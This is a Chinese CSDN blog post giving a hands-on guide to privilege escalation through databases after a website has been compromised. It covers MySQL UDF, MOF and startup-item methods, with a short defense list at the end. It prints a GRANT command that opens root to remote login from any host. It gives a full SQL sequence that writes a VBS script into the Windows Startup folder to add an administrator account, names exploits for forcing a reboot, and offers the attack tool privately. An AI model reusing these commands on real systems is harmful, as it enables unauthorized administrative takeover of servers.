数据库提权(实战案例)

最新推荐文章于 2024-07-12 16:35:20 发布
最新推荐文章于 2024-07-12 16:35:20 发布
阅读量1k 收藏 14
点赞数 18
分类专栏: 网络安全知识 文章标签: 数据库 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75341517/article/details/139659706
版权

本文主要介绍常见数据库如何进行提权操作,如mysql(mof,udf,启动项),mssql,orcale数据库,

1.mysql数据库

1.提权条件

开启数据库服务

获得数据库最高权限密码

1.如何获取到数据库账户密码

在拿下目标网站后,通过webshell去查看网站的数据库连接文件,一般会有数据库的用户及密码信息

数据库有对应的实体文件,通过实体文件去查看

2.udf提权

1.通过本地连接的方式连接数据库

2.开启root远程登录权限

基于安全考虑root账户一般只能本地访问,但是在开发过程中可能需要打开root的远程访问权限。为root进行远程访问的授权,执行下面的命令:

 mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
 mysql> flush privileges;

第一句中"%"表示任何主机都可以远程登录到该服务器上访问。如果要限制只有某台机器可以访问,将其换成相应的IP即可,如: GRANT ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root"; 第二句表示从mysql数据库的grant表中重新加载权限数据。因为MySQL把权限都放在了cache中,所以在做完更改后需要重新加载

3.使用mysql提权工具连接(可以私信找我发你)

3.导入udf.dll

小于mysql5.1版本 C:\\WINDOWS\\udf.dll 或 C:\\WINDOWS\\system32\\udf.dll

等于mysql5.1版本 %mysql%\\plugin\\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/udf.dll    因为我们这里是在C:\php\MySQL-5.1.50\lib\plugin\udf.dll

4.执行sql语句

可以有很多操作空间这里就不演示了

3.mof提权

条件:

操作系统低于2008

数据库版本低于5.7且允许外联

1.使用工具连接并执行命令

cmd命令行查看

注:该工具每隔五秒创建一次,彻底清除方法如下:

# 停止 winmgmt 服务net stop winmgmt
# 删除 Repository 文件夹rmdir /s /q C:\Windows\system32\wbem\Repository\
# 手动删除mof 文件del C:\Windows\system32\wbem\mof\good\test.mof /F /S
# 删除创建的用户net user hacker /delete
# 重新启动服务net start winmgmt

3.启动项提权

1、通过mysql数据库命令写入VBS脚本;

2、直接通过Webshell的Mysql写入启动项;

3、通过MS12-020、MS15-034重启服务器。

过程代码

C:\php\MySQL-5.1.50\bin>mysql -uroot -proot -h192.168.1.109
mysql>drop database test1;
mysql> create database test1;
mysql> use test1;
mysql> create table a (cmd text);
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
mysql>select * from a;
mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";

#最后通过溢出漏洞让服务器重启,如:MS12-020、MS15-034

2.mssql提权

 mssql提权主要分为弱口令与溢出两类提权。目前主要通过弱口令连接直接提权,溢出类Mssql数据库几乎很少见。

3、oracle提权

      Oracle数据库一般与jsp、aspx网站搭配,如果是jsp网站,默认是系统权限,apsx网站默认需要提权。提权方法参考如下地址:

http://blog.csdn.net/sezvboyrul/article/details/2855401

4.如何防范

1、限止数据库远程连接,给数据库帐户设置密码必须>8位以上并数字+字母+特殊符号等。

2、不要给网站配置root或SA权限。必须给每个网站独立分配数据库帐户并限格控制好权限。

3、及时升级数据库补丁。

4、安装Waf进行防御。

5、购买数据库审计设备

一个w蝰蛇
关注
  • 18
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库SQL实战案例.zip
05-21
"数据库SQL实战案例.zip"这个压缩包文件,从其标题和描述来看,显然包含了关于数据库操作和SQL实际应用的练习题目,可能是为了帮助用户提升数据库查询和管理的能力。在数据库系统中,SQL是用于与关系型数据库进行...
数据库实战案例及详细解释】数据库实战案例及详细解释
05-21
数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库实战案例及详细解释数据库...
mysql提权总结(自学),2024年最新从网络安全语言到AIDL使用与原理讲解
2401_83621384的博客
04-15 651
检测数据库的存在(探测端口)获取到数据库的权限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库中的表的信息,例如MySQL数据库在mysql_user表中存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库提权方式主要有三种使用sqlmap的–os-shell。
Mysql数据库实战教程&案例&相关项目
05-01
以下是对MySQL数据库实战教程、案例及相关项目的描述: MySQL数据库实战教程: 教程目的:教程旨在教授学习者如何高效地使用MySQL进行数据存储、查询、更新和管理。通过实战案例,学习者将掌握数据库设计、SQL语言...
提权服务器(实战).wmv
10-12
在这个"提权服务器(实战).wmv"的资源中,我们可能将深入探讨如何防止和应对这种威胁。 首先,我们要理解服务器提权的常见手段。一种常见的方法是利用操作系统或应用程序的漏洞,比如缓冲区溢出、路径遍历或权限误...
数据库实战案例 - SQL server 实战题目汇总.rar
05-20
数据库实战案例 - SQL server 实战题目汇总 数据库实战案例 - SQL server 实战题目汇总 数据库实战案例 - SQL server 实战题目汇总 查找最晚入职员工的所有信息 查找入职员工时间排名倒数第三的员工所有信息 查找...
初始C++
2302_81016149的博客
07-08 806
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
set user & password for database 设置数据库 用户和密码
DavidsonGong的博客
07-12 101
USE sbms;
mysql笔记1
m0_62975692的博客
07-11 263
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
docker-compose安装PolarDB-PG数据库
wnfff的博客
07-12 205
docker-compose安装PolarDB-PG数据库
Redis数据结构-String篇
最新发布
时间如瑾 代码如诗
07-12 515
对⼀个内部表示成long型的string执行append, setbit, getrange这些命令,针对的仍然是string的值(即⼗进制表示的字符串),而不是针对内部表⽰的long型进⾏操作。因此,在这些命令的实现中,会把long型先转成字符串再进行相应的操作。String 的内部存储结构⼀般是 sds(Simple Dynamic String,可以动态扩展内存),但是如果⼀个String 类型的 value 的值是数字,那么 Redis 内部会把它转成 long 类型来存储,从⽽减少内存的使用。
系统架构设计师教程 第二章 计算机系统基础知识-2.3计算机软件
Remon的专栏
07-09 722
《系统架构设计师教程》清华第二版 2.3计算机软件 章节的详细解读
Java:使用synchronized和Redis实现并发控制的区别
好幸运
07-08 462
而Redis则适用于分布式环境下的同步需求,虽然操作相对复杂,但它能够解决跨JVM的资源竞争问题。: 是Java语言内置的关键字,用于实现线程间的同步。这种同步是** JVM层面**的,对本地内存中的对象进行操作。Redis: 由于是基于网络通信的分布式存储,它的性能受到网络延迟和带宽的影响。然而,在分布式环境下,Redis提供的分布式锁机制能够有效解决跨JVM的同步问题,尽管相比。Redis: 使用Redis实现同步(如通过SETNX命令设置锁),需要手动编写代码来获取和释放锁。
CH-benCHmark:一个HTAP数据库测试基准
算力测评
07-09 258
这一基准测试,旨在弥合TPC-C(专注于联机事务处理,即OLTP)与TPC-H(侧重于联机分析处理,即OLAP)这两项业界权威但单一的工作负载测试之间的鸿沟。它巧妙地结合了TPC-C的订单录入流程产生的交易负载,以及与之对应的、等同于TPC-H级别的OLAP查询套件,并在单一数据库系统内的同一数据集上并行执行。正因为继承自两个最广泛应用的TPC标准,CH-benCHmark的测试结果不仅对混合负载系统具有重大参考价值,同时也适用于传统的单一工作负载场景。
数据库db文件损坏修复方法(sqlite3:database disk image is malformed)
Littlehero_121的博客
07-10 511
一、第一种方式:通过 使用SQLite Expert Professional软件来修复。二、通过命令行,将db文件数据导出到.sql语句,然后建个新的db文件,放进去这样的流程。通过New file ->Start就可以完成,如果文件比较大,那就比较耗时,等待即可。再去看repair.db已经不再是空的了,修复完成。直接拖入受损的db文件,然后进行Repair。(2)在受损的db文件路径中,使用终端打开。发现新生成一个 repair.db文件。发现多了个repair.sql。
mysql 表优化
马春林的专栏
07-08 192
mysql 表优化
在centos7.9下静默安装Oracle19c详细流程
欢迎来到我的学习笔记薄
07-12 146
HOST修改成自己的主机名或IP。
源码编译安装 LAMP
2301_76414216的博客
07-09 607
Apache HTTP Server”是开源软件项目的杰出代表,它基于标准的 HTTP 网络协议提供网页浏览服务,在 Web 服务器领域中长期保持着超过半数的份额。Apache 服务器可以运行在 Linux、UNIX、Windows 等多种操作系统平台中。
MySQL怎么获取当前时间
zhanchulan的博客
07-08 296
这些函数可以根据您的具体需求来获取不同精度的当前时间信息。函数返回当前的日期和时间,格式为。相同,返回当前的日期和时间。
oracle数据库提权原理
09-07
Oracle数据库提权原理涉及到Oracle数据库的权限管理和用户权限控制机制。 在Oracle数据库中,权限是分层次的,包括系统级权限和对象级权限。系统级权限用于控制数据库整体的操作,如创建用户、分配角色等;对象级...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值